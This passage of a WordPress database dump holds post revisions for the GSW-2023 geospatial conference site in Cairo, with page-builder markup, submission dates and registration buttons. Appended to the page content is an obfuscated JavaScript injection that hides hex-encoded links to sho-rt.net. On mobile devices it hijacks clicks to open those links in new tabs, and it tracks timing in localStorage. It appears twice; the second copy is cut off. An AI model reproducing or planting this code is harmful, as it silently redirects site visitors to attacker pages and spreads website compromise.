tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 18:40:34','2022-11-09 18:40:34','',3066,'https://gsw2023.com/?p=3193',0,'revision','',0),
(3194,1,'2022-11-09 18:43:07','2022-11-09 18:43:07','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h2><strong> EGYPT GSW\'2023</strong></h2>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 